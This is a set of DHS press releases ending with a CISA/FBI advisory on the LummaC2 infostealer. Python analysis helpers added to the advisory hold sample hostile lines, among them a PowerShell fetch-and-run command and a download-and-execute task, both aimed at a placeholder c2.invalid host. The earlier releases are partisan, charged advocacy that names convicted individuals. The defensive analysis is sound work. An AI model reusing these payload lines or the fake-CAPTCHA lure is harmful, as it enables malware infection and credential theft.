President Trump and Secretary Noem Recognize 101 Years of Border Patrol

Source: US Department of Homeland Security

WASHINGTON – On Tuesday, President Donald J. Trump issued a Proclamation recognizing the United States Border Patrol on the eve of its 101st anniversary. 

“For more than a century, the men and women of the Border Patrol have stood on the front lines of national security as America’s original watchmen. The threats may change, but the mission remains: protect the homeland,” said Department of Homeland Security Secretary Kristi Noem. “On Border Patrol’s 101st anniversary, we honor and thank all who’ve worn the uniform. A nation without borders is no nation at all.”  

As noted by the Proclamation, President Donald Trump has delivered the most secure border in American history, with border crossings at their lowest ever. 

“For 101 years, members of the United States Border Patrol (USBP) have courageously served as guardians of our sovereignty and protectors of our homeland against invasion, aggression, and violence,” President Trump said in the Proclamation. “Every day, Border Patrol agents selflessly risk their lives to repel the flow of deadly drugs, weapons, criminals, and terrorists — many of whom come to our shores from jails, prisons, and mental institutions in far-flung countries across the globe. On this anniversary of the United States Border Patrol, we honor every agent for their honorable service and pledge to support them in their mission to keep Americans safe.” 


###

MEDIA ADVISORY: FOR PLANNING PURPOSES ONLY: U.S. Department of Homeland Security Secretary Kristi Noem to Travel to Israel

Source: US Department of Homeland Security

Visit to include meeting with Israeli PM Netanyahu, Visits with Victims of Terrorism

WASHINGTON – Following the recent terrorist attack in Washington, D.C., President Donald J. Trump has asked Secretary of Homeland Security Kristi Noem to travel to Israel. During the visit, she will meet with Israeli Prime Minister Benjamin Netanyahu and victims of terrorism.

WHEN: Sunday, May 25 to Monday, May 26, 2025.

IDT (GMT+3)

Sunday, May 25, 2025

7:30 PM          THE SECRETARY arrives in Israel
                       Ben Gurion Airport

9:15 PM          THE SECRETARY visits the Western Wall
                       Batel Mahase Street
                       Traveling press            

Monday, May 26, 2025

9:00 AM          THE SECRETARY meets with the Minister of Foreign Affairs
                       Sderot Yitzhak Rabin 9, Jerusalem
                       American and Foreign press

3:45 PM          THE SECRETARY arrives Ben Gurion Airport
                                
4:15 PM          THE SECRETARY departs Ben Gurion Airport en route to Poland.
                   
Please RSVP media@hq.DHS.gov if you plan to cover the events. Times are subject to change. 
 

ACLU Attempt to Block Criminal Illegal Alien Removals Fails Spectacularly

Source: US Department of Homeland Security

The ACLU’s dangerous campaign to keep violent criminals in the United States is falling apart.

WASHINGTON – Homeland Security Secretary Kristi Noem announced that the American Civil Liberties Union’s (ACLU) latest attempt to wage lawfare against the Department was dropped. This lawsuit tried to prevent DHS from removing dangerous criminal illegal aliens from the country. 

“We are glad to see the ACLU’s meritless, frivolous, and frankly dangerous lawsuit fall apart,” said Assistant Secretary Tricia McLaughlin. “That they claim to be a civil rights organization while advocating on behalf of foreign criminal gang members is laughable. They clearly could care less about the Americans that these illegal alien criminals victimize.”

The lawsuit was filed on March 1, 2025, by the ACLU on behalf of 10 illegal aliens who were being transferred to a detention facility at Guantanamo Bay in preparation for their removal. Most of these criminal illegal aliens were removed from the country, while the remaining volunteered to drop the suit. 

Fortunately, these criminals will no longer be able to victimize American citizens. The Department will continue to use all available resources to remove the dangerous criminal illegal aliens who were let into our country by the previous administration.

###

DHS Releases Documents Detailing the Rap Sheets of 8 Criminal Illegal Aliens after Activist Judge Ruling Halts their Deportation

Source: US Department of Homeland Security

President Trump and Secretary Noem are getting vicious criminals out of our country while activist judges are fighting to bring them back onto American soil

WASHINGTON – The Department of Homeland Security (DHS) today released records on the eight convicted murderers and rapists whose deportation an activist judge halted. All eight of these barbaric criminal illegal aliens have final orders of removal and have been convicted in a court of law. These records reveal even more details about these illegal aliens’ heinous crimes.


“Today, DHS released the rap sheets for eight of these uniquely monstrous, criminal illegal aliens who have final deportation orders that the U.S. government is actively trying to deport. The American public should know the heinous crimes of these murderers, rapists, and pedophiles that this activist district court judge is trying to bring back to American soil,” said Assistant Secretary Tricia McLaughlin. “As he spits in the face of victims, this Massachusetts district court judge is stalling the final removal of these barbaric individuals from the country and wants taxpayers to continue to foot the bill to keep these criminals in DHS custody overseas. It is deranged.”

Below are excerpts of the rap sheets of each of the criminal illegal aliens, detailing heinous crimes.  

Nyo Myint: Convicted sexual assault of a mentally disabled woman 

Nyo Myint, an illegal alien from Burma and a registered sex offender, was arrested by ICE St. Paul on February 18, 2025. Myint was convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting and sentenced to 12 years confinement. Myint has also been charged with aggravated assault-nonfamily strongarm. He was issued a final order of removal on August 17, 2023.


Enrique Arias-Hierro: Convicted homicide, armed robbery 

Enrique Arias-Hierro, an illegal alien from Cuba, was arrested by ICE Miami on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm. He was issued a final order of removal on September 13, 1999.


Tuan Thanh Phan: Convicted of first-degree murder and second-degree assault 

On May 3, 2025, ICE Seattle arrested Tuan Thanh Phan, an illegal alien from Vietnam. Phan was convicted of first-degree murder and second-degree assault and sentenced to 22 years confinement. Prior to that, he was charged as a juvenile in 1999 with possession of a dangerous weapon on a school facility. He was issued a final order of removal on June 17, 2009.


Jose Manuel Rodriguez-Quinones: Convicted of attempted first-degree murder 

On April 30, 2025, ICE Miami arrested Jose Manuel Rodriguez-Quinones, an illegal alien from Cuba. He has been convicted of attempted first-degree murder with a weapon, battery and larceny, cocaine possession and trafficking. Additionally, he was charged with attempted first-degree murder, trafficking and possessing cocaine, assault, credit card fraud, and theft. He was issued a final order of removal on December 4, 2012.


Dian Domach: Convicted of robbery  

Dian Domach is an illegal alien from South Sudan whom ICE first encountered in 2011, when he was charged as a deportable alien. While in the U.S., Domach was convicted of robbery, possession of a firearm, possession of burglar’s tools, possession of a defaced firearm, and driving under the influence. He was arrested by ICE on May 8, 2024, and had been issued a final order of removal on July 19, 2011.


Thongxay Nilakout: Convicted Murderer Sentenced to Life in Prison 

Thongxay Nilakout, an illegal alien from Laos, was arrested by ICE Los Angeles on January 26, 2025. Nilakout was convicted of first-degree murder and robbery; sentenced to life in prison. He was issued a final order of removal on July 12, 2023.


Jesus Munoz-Gutierrez: Convicted murderer sentenced to life in prison 

On May 12, 2025, ICE Miami arrested Jesus Munoz-Gutierrez, an illegal alien from Mexico. He was convicted of second-degree murder and sentenced to life confinement. He was issued a final order of removal on June 16, 2005.


Kyaw Mya: Convicted of rape of a child 

Kyaw Mya, an illegal alien from Burma, was arrested by ICE St. Paul on February 18, 2025. Mya was convicted of Lascivious Acts with a Child-Victim less than 12 years of age and sentenced to 10 years confinement, paroled after 4 years. He was issued a final order of removal on March 17, 2022.


###

Harvard University Loses Student and Exchange Visitor Program Certification for Pro-Terrorist Conduct

Source: US Department of Homeland Security

Harvard is being held accountable for collaboration with the CCP, fostering violence, antisemitism, and pro-terrorist conduct from students on its campus.

WASHINGTON – Today, Homeland Security Secretary Kristi Noem ordered DHS to terminate Harvard University’s Student and Exchange Visitor Program (SEVP) certification.

This means Harvard can no longer enroll foreign students and existing foreign students must transfer or lose their legal status. 

Harvard’s leadership has created an unsafe campus environment by permitting anti-American, pro-terrorist agitators to harass and physically assault individuals, including many Jewish students, and otherwise obstruct its once-venerable learning environment. Many of these agitators are foreign students. Harvard’s leadership further facilitated, and engaged in coordinated activity with the CCP, including hosting and training members of a CCP paramilitary group complicit in the Uyghur genocide.

“This administration is holding Harvard accountable for fostering violence, antisemitism, and coordinating with the Chinese Communist Party on its campus,” said Secretary Noem. “It is a privilege, not a right, for universities to enroll foreign students and benefit from their higher tuition payments to help pad their multibillion-dollar endowments. Harvard had plenty of opportunity to do the right thing. It refused. They have lost their Student and Exchange Visitor Program certification as a result of their failure to adhere to the law. Let this serve as a warning to all universities and academic institutions across the country.”

On April 16, 2025, Secretary Noem demanded Harvard provide information about the criminality and misconduct of foreign students on its campus. Secretary Noem warned refusal to comply with this lawful order would result in SEVP termination.

This action comes after DHS terminated $2.7 million in DHS grants for Harvard last month. 

Harvard University brazenly refused to provide the requested information and ignored a follow-up request from the Department’s Office of General Counsel. Secretary Noem is following through on her promise to protect students and prohibit terrorist sympathizers from receiving benefits from the U.S. government.

Facts about Harvard’s toxic campus climate:

  • A joint government task force found that Harvard has failed to confront pervasive race discrimination and anti-Semitic harassment plaguing its campus.
  • Jewish students on campus were subject to pervasive insults, physical assault, and intimidation, with no meaningful response from Harvard’s leadership.
  • A protester charged for his role in the assault of a Jewish student on campus was chosen by the Harvard Divinity School to be the Class Marshal for commencement.
  • Harvard’s own 2025 internal study on anti-Semitism revealed that almost 60% of Jewish students reported experiencing “discrimination, stereotyping, or negative bias on campus due to [their] views on current events.”
  • In one instance, a Jewish student speaker at a conference had planned to tell the story of his Holocaust survivor grandfather finding refuge in Israel. Organizers told the student the story was not “tasteful” and laughed at him when he expressed his confusion. They said the story would have justified oppression.
  • Meanwhile, Pro-Hamas student groups that promoted antisemitism after the October 7 attacks remained recognized and funded.

Instead of protecting its students, Harvard has let crime rates skyrocket, enacted racist DEI practices, and accepted boatloads of cash from foreign governments and donors. 

###

AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems

Source: US Department of Homeland Security

CISA, the National Security Agency, the Federal Bureau of Investigation, and international partners released AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems.

This guidance highlights the critical role of data security in ensuring the accuracy, integrity, and trustworthiness of AI outcomes. It outlines key risks that may arise from data security and integrity issues across all phases of the AI lifecycle, from development and testing to deployment and operation. 

DHS Reacts to Activist Judge Ruling to Halt the Deportation of Barbaric Criminal Illegal Aliens Including Murderers, Rapists, and Pedophiles

Source: US Department of Homeland Security

All eight of these heinous convicted criminals have final orders of removal 

WASHINGTON – DHS conducted a deportation flight to remove some of the most barbaric, violent individuals illegally in the United States. All of these individuals had final orders of removal.  Now a federal judge in Massachusetts is halting their deportation and trying to force President Trump to bring these criminals back to American soil.  

“This ruling is deranged. These depraved individuals have all had their day in court and been given final deportation orders. A reminder of who was on this plane: murderers, child rapists, an individual who raped a mentally & physically disabled person,” said Assistant Secretary Tricia McLaughlin. “The message this activist judge is sending to victims and their families is we don’t care. President Trump and Secretary Noem are working every day to get vicious criminals out of our country while activist judges are fighting to bring them back onto American soil.” 

Below are the individuals ICE removed from American communities:  

Enrique ARIAS-Hierro, a Cuban national, was arrested by ICE Miami on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm. He was issued a final order of removal on September 13, 1999.  


On April 30, 2025, ICE Miami arrested Cuban national Jose Manuel RODRIGUEZ-QUINONES. He has been convicted of attempted first-degree murder with a weapon, battery and larceny, and cocaine possession and trafficking. He was issued a final order of removal on December 4, 2012.  


Thongxay NILAKOUT, a citizen of Laos, was arrested by ICE Los Angeles on January 26, 2025. NILAKOUT was convicted of first-degree murder and robbery and sentenced to life confinement. He was issued a final order of removal on July 12, 2023.  


On May 12, 2025, ICE Miami arrested Mexican national Jesus MUNOZ-Gutierrez. He was convicted of second-degree murder and sentenced to life confinement. He was issued a final order of removal on June 16, 2005.  


Dian Peter DOMACH, a citizen of South Sudan, was arrested by ICE St. Paul on May 8, 2024. DOMACH was convicted of robbery, possession of a firearm, possession of burglar’s tools, possession of a defaced firearm, and driving under the influence. He was issued a final order of removal on July 19, 2011.  


Kyaw MYA, a citizen of Burma, was arrested by ICE St. Paul on February 18, 2025. MYA was convicted of Lascivious Acts with a Child-Victim less than 12 years of age and sentenced to 10 years confinement, paroled after 4 years. He was issued a final order of removal on March 17, 2022.   


Nyo MYINT, a citizen of Burma, was arrested by ICE St. Paul on February 18, 2025. MYINT was convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting and sentenced to 12 years confinement. MYINT has also been charged with aggravated assault-nonfamily strongarm. He was issued a final order of removal on August 17, 2023.   


On May 3, 2025, ICE Seattle arrested Tuan Thanh PHAN, a Vietnamese national. PHAN was convicted of first-degree murder and second-degree assault and sentenced to 22 years confinement. He was issued a final order of removal on June 17, 2009.  


###

ICE Lodges Detainer for 24-year-old Illegal Alien Posing as Teenager in Ohio

Source: US Department of Homeland Security

WASHINGTON – The Department of Homeland Security today announced that Immigration and Customs Enforcement (ICE) lodged a detainer for a 24-year-old illegal alien from Venezuela who posed as a teenager to attend an Ohio high school. 

On May 19, the Perrysburg Ohio Police Department arrested and charged Anthony Emmanuel Labrador-Sierra with forgery. On May 20, ICE issued a detainer. 


Mug shot from Wood County Jail.

“Anthony Emmanuel Labrador-Sierra is a 24-year-old illegal alien from Venezuela who has been posing as a teenager and attending Perrysburg High School in Ohio,” said Assistant Secretary Tricia McLaughlin. “Labrador was arrested and charged with forgery by the Perrysburg Ohio Police Department on May 19 for using fake documents to become enrolled in the high school. ICE lodged a detainer to ensure that this criminal illegal alien is removed from this community and no longer able to prey on the students of Perrysburg High School. It is disturbing that a grown man would impersonate a teenager and infiltrate the lives of underage girls and boys to fool them into doing God knows what.”

Labrador has been in the U.S. illegally since March 24, 2020. 

###

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Source: US Department of Homeland Security

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.



Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

Overview

LummaC2 malware first appeared for sale on multiple Russian-language cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload themselves by way of a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The fake CAPTCHA instructs the user to open the Windows Run dialog (Windows key + R) and paste the clipboard contents (CTRL + V), which the page has already populated; when the user presses Enter, the pasted command launches a PowerShell process with a Base64-encoded command.
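The last step of that chain leaves two host artifacts a responder can check: the pasted command is recorded under the user's RunMRU registry key and appears as the command line of the new PowerShell process, and the argument of -EncodedCommand is Base64 of the script's UTF-16LE bytes. The following Python helper, an added example rather than code from the advisory, recognises the flag (including the short forms powershell.exe accepts, while not matching -ep for ExecutionPolicy) and decodes the payload. The RunMRU entries, the encoded script and the c2.invalid URL are constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Command-line tokens: double- or single-quoted strings, or runs of non-space characters.
_TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
_PS_RE = re.compile(r"powershell|pwsh", re.IGNORECASE)


def _is_encoded_flag(tok: str) -> bool:
    """True for -EncodedCommand and the short forms powershell.exe accepts.

    powershell.exe resolves any unambiguous prefix of a parameter name (-e, -en,
    -enc, ...) and also documents -ec; -ep (ExecutionPolicy) must not match.
    """
    if not tok.startswith(("-", "/")):
        return False
    name = tok[1:].lower()
    return name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name))


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when cmdline carries an -EncodedCommand payload, else None.

    -EncodedCommand takes Base64 of the script's UTF-16LE bytes, not UTF-8, so a
    plain base64-then-utf8 decode of these blobs shows a null between characters.
    """
    if not _PS_RE.search(cmdline):
        return None
    toks = _TOKEN_RE.findall(cmdline)
    for i in range(len(toks) - 1):
        if _is_encoded_flag(toks[i]):
            blob = toks[i + 1].strip("\"'")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None


def encode_command(script: str) -> str:
    """Encode a script the way an operator does for -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def scan_runmru(entries: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Run extract_encoded_command over RunMRU-style values.

    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU records each
    Win+R command as a string value ending in the two characters '\\1'; the MRUList
    value is the ordering, not a command.
    """
    hits = []
    for name, data in entries.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        decoded = extract_encoded_command(cmd)
        if decoded is not None:
            hits.append((name, cmd, decoded))
    return hits


# Constructed sample: two ordinary Run-dialog entries and one fake-CAPTCHA paste.
# The URL is a placeholder; the .invalid TLD never resolves.
SAMPLE_SCRIPT = "iex (irm http://c2.invalid/verify)"
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -w hidden -ep bypass -enc " + encode_command(SAMPLE_SCRIPT) + "\\1",
}

if __name__ == "__main__":
    for name, cmd, decoded in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU value {name}: {cmd[:50]}...")
        print(f"  decoded -EncodedCommand: {decoded}")
```

The same extract_encoded_command call works on the CommandLine field of a process-creation event (Sysmon Event ID 1 or Windows Event ID 4688), which is where the Base64 PowerShell launch shows up when the Run dialog history has been cleared.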

To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake copies of popular software (e.g., multimedia players or utilities) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, that are designed to flag common phishing attempts or drive-by downloads [T1027].

Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

File Execution

Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).

Figure 1. LummaC2 Main Routine

The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

Figure 2. Message Box

If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.

After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).

Figure 3. Post Request

If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4).

Figure 4. Code Saving Successful Callback Request

Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

Figure 5. User and Computer Name Check

The hashing routine was not identified as a standard algorithm; it is a simple routine that reduces a Unicode string to a 32-bit value.

If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.
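The check above, re-implemented in Python as an added example (not code from the advisory or from the malware). The advisory does not publish the hashing routine, so 32-bit FNV-1a over the UTF-16LE name is substituted as a stand-in; the hard-coded constants are the two quoted above and the control flow (username hash first, then a seven-character computer name, then its hash, then terminate) follows the description. The second function makes the practical point behind "one-way only": the hash keeps the operator's names out of the binary, but a 32-bit output can still be tested against a wordlist of plausible names. The wordlist is made up.

```python
from typing import Iterable, List

# Hard-coded target hashes quoted in the advisory.
USERNAME_HASH = 0x56CF7626
COMPUTERNAME_HASH = 0xB09406C7


def hash32(s: str) -> int:
    """Stand-in one-way 32-bit string hash: FNV-1a over the UTF-16LE bytes of s.

    Assumption: LummaC2's own routine differs (the advisory only says it is
    non-standard and reduces a Unicode string to 32 bits); this reproduces the
    shape of the check, not its constant-for-constant behaviour.
    """
    h = 0x811C9DC5
    for b in s.encode("utf-16-le"):
        h ^= b
        h = (h * 0x01000193) & 0xFFFFFFFF
    return h


def kill_switch_hit(username: str, computername: str,
                    user_hash: int = USERNAME_HASH,
                    comp_hash: int = COMPUTERNAME_HASH) -> bool:
    """True when the implant would take the terminate path instead of calling back.

    Order follows the advisory: hash the username first; only if it matches is the
    computer name considered, and it must be exactly seven characters before it
    is hashed and compared.
    """
    if hash32(username) != user_hash:
        return False
    if len(computername) != 7:
        return False
    return hash32(computername) == comp_hash


def find_preimages(candidates: Iterable[str], target: int) -> List[str]:
    """Dictionary check against a 32-bit name hash.

    A one-way hash keeps the operator's names out of the binary, but a 32-bit
    output still lets an analyst try a wordlist of plausible user and host names
    against the hard-coded values; a hit reveals which machine the malware avoids.
    """
    return [c for c in candidates if hash32(c) == target]


if __name__ == "__main__":
    # Made-up wordlist; with the FNV stand-in a match against the real constants
    # would be coincidence, which is the point of swapping in a known algorithm.
    wordlist = ["admin", "user", "analyst", "sandbox", "WIN-DEV", "DESKTOP"]
    print("username preimages:", find_preimages(wordlist, USERNAME_HASH))
    print("computer-name preimages:",
          find_preimages([w for w in wordlist if len(w) == 7], COMPUTERNAME_HASH))
    print("terminates on analyst/DESKTOP?", kill_switch_hit("analyst", "DESKTOP"))
```

To use this against the real sample, replace hash32 with the routine lifted from the binary at the point shown in Figure 5; the two constants and the seven-character length check stay as they are.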

If the username and hostname check function returns zero (the values do not match the hard-coded hashes), the malware enters its main callback routine. LummaC2 contacts the C2 domain saved by the earlier callback routine and sends the following POST request (see Figure 6).

Figure 6. Second POST Request

The data returned from the C2 server is encrypted. Once decrypted, the C2 data is JSON and is parsed by LummaC2. The implant reads its browser-extension and target lists from the ex key, which contains an array of objects (see Figure 7).

Figure 7. Parsing of ex JSON Value

The c key also contains an array of objects; these supply the implant’s C2 instructions (see Figure 8).

Figure 8. Parsing of c JSON Value

C2 Instructions

Each array object that contains the JSON key value of t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.

1. Opcode 0 – Steal Data Generic

This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode 0 command lets LummaC2 affiliates specify their own information-gathering targets (see Table 1).

Table 1. Opcode 0 Options
Key Value
p Path to steal from
m File extensions to read
z Output directory to store stolen data
d Depth of recursiveness
fs Maximum file size

2. Opcode 1 – Steal Browser Data

This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2).

Table 2. Opcode 1 Options
Key Value
p Path to steal from
z Name of Browser – Output

3. Opcode 2 – Steal Browser Data (Mozilla)

This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).

Table 3. Opcode 2 Options
Key Value
p Path to steal from
z Name of Browser – Output

4. Opcode 3 – Download a File

This command contains three options: a URL, a file extension, and an execution type. The configuration specifies the remote file to download with u; the file is written with the extension given in the ft key [T1105] (see Table 4).

Table 4. Opcode 3 Options
Key Value
u URL for Download
ft File Extension
e Execution Type

The e value can take two values: 0 or 1. This specifies how to execute the downloaded file either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5).

Table 5. Execution Types
Key Value
e=0 Execute with LoadLibraryW()
e=1 Execute with rundll32.exe

5. Take Screenshot

If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server.

6. Delete Self

If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself.

The command shown in Figure 9 will be decoded and executed for self-deletion.

Figure 9. Self-Deletion Command Line

Figure 10 depicts the above command line during execution.

Figure 10. Decoded Command Line in Memory
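To make the command structure concrete, the following Python parser (an added example, not code from the advisory) turns a LummaC2-style task configuration into an analyst-readable plan, using the key names and opcode meanings from the C2 Instructions section above (t, p, m, z, d, fs, u, ft, e, se, ad). The sample configuration is constructed; it assumes se and ad sit at the top level of the JSON, and it treats the contents of the ex array as opaque, since the advisory documents neither the placement of those flags nor the format of ex entries.

```python
import json
from dataclasses import dataclass, field
from typing import Any, Dict, List

# Opcode -> name, per the advisory's C2 Instructions section.
OPCODE_NAMES = {0: "steal-generic", 1: "steal-browser", 2: "steal-browser-mozilla", 3: "download-file"}
# Keys each opcode may carry (Tables 1-4); anything else is worth a second look.
ALLOWED_KEYS = {0: {"p", "m", "z", "d", "fs"}, 1: {"p", "z"}, 2: {"p", "z"}, 3: {"u", "ft", "e"}}
# Opcode 3 execution types (Table 5).
EXEC_TYPES = {0: "LoadLibraryW", 1: "rundll32.exe"}


def _truthy(v: Any) -> bool:
    """The advisory quotes the value as "true"; accept JSON true or the string."""
    return v is True or (isinstance(v, str) and v.lower() == "true")


@dataclass
class Task:
    opcode: int
    name: str
    params: Dict[str, Any]
    warnings: List[str] = field(default_factory=list)


@dataclass
class Plan:
    tasks: List[Task]
    extension_targets: int  # number of entries under ex (entry format not documented)
    screenshot: bool        # se
    self_delete: bool       # ad


def parse_config(raw: str) -> Plan:
    """Parse decrypted C2 JSON into the actions the implant would carry out."""
    cfg = json.loads(raw)
    tasks: List[Task] = []
    for obj in cfg.get("c", []):
        if not isinstance(obj, dict) or "t" not in obj:
            continue  # only objects carrying t are evaluated as command opcodes
        op = obj["t"]
        params = {k: v for k, v in obj.items() if k != "t"}
        task = Task(op, OPCODE_NAMES.get(op, f"unknown-{op}"), params)
        if op not in OPCODE_NAMES:
            task.warnings.append("undocumented opcode")
        else:
            extra = set(params) - ALLOWED_KEYS[op]
            if extra:
                task.warnings.append(f"unexpected keys {sorted(extra)}")
        if op == 3:
            exec_type = EXEC_TYPES.get(params.get("e"))
            params["exec"] = exec_type or f"unknown({params.get('e')!r})"
            if exec_type is None:
                task.warnings.append("unexpected e value")
        tasks.append(task)
    return Plan(tasks, len(cfg.get("ex", [])), _truthy(cfg.get("se")), _truthy(cfg.get("ad")))


def describe(plan: Plan) -> List[str]:
    """One line per action, in the order the implant evaluates them."""
    lines = []
    for t in plan.tasks:
        line = f"{t.name}: {t.params}"
        if t.warnings:
            line += "  !! " + "; ".join(t.warnings)
        lines.append(line)
    if plan.screenshot:
        lines.append("screenshot: BMP capture uploaded to C2")
    if plan.self_delete:
        lines.append("self-delete: implant removes its own binary")
    return lines


# Constructed sample configuration (not a real LummaC2 capture); the ex entry
# fields are placeholders because the advisory does not describe that format.
SAMPLE_CONFIG = json.dumps({
    "ex": [{"n": "wallet-ext", "i": "abcdef"}],
    "c": [
        {"t": 0, "p": "%USERPROFILE%\\Documents", "m": "*.txt,*.pdf", "z": "Documents", "d": 2, "fs": 2000000},
        {"t": 1, "p": "%LOCALAPPDATA%\\Google\\Chrome\\User Data", "z": "Chrome"},
        {"t": 2, "p": "%APPDATA%\\Mozilla\\Firefox\\Profiles", "z": "Firefox"},
        {"t": 3, "u": "http://c2.invalid/next.bin", "ft": "dll", "e": 1},
        {"x": "no opcode here"},
    ],
    "se": True,
    "ad": "true",
})

if __name__ == "__main__":
    for line in describe(parse_config(SAMPLE_CONFIG)):
        print(line)
```

Run over a decrypted C2 response captured in a sandbox, the warnings column is the useful part: an opcode or key the advisory does not list indicates a newer build than the one analysed, and an e value other than 0 or 1 means the download-and-execute path has changed.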

Host Modifications

Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.

Decrypted Strings

Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

Figure 11. Decoded Strings

Indicators of Compromise

See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.

Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

Table 6. LummaC2 Executable Hashes
Executables Type
4AFDC05708B8B39C82E60ABE3ACE55DB (LummaC2.exe from November 2023) MD5
E05DF8EE759E2C955ACC8D8A47A08F42 (LummaC2.exe from November 2023) MD5
C7610AE28655D6C1BCE88B5D09624FEF MD5
1239288A5876C09D9F0A67BCFD645735168A7C80 (LummaC2.exe from November 2023) SHA1
B66DA4280C6D72ADCC68330F6BD793DF56A853CB (LummaC2.exe from November 2023) SHA1
3B267FA5E1D1B18411C22E97B367258986E871E5 TLSH
19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023) SHA256
2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (LummaC2.exe from November 2023) SHA256
4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D SHA256
325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a SHA256
76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c SHA256
7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70 SHA256
a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab SHA256
b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959 SHA256
ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b SHA256
Table 7. LummaC2 DLL Binaries
DLL Binaries Type
iphlpapi.dll IP Helper API
winhttp.dll Windows HTTP Services

The following are domains observed deploying LummaC2 malware.

Disclaimer: The domains below are historical in nature and may not currently be malicious.

  • Pinkipinevazzey[.]pw
  • Fragnantbui[.]shop
  • Medicinebuckerrysa[.]pw
  • Musicallyageop[.]pw
  • stogeneratmns[.]shop
  • wallkedsleeoi[.]shop
  • Tirechinecarpet[.]pw
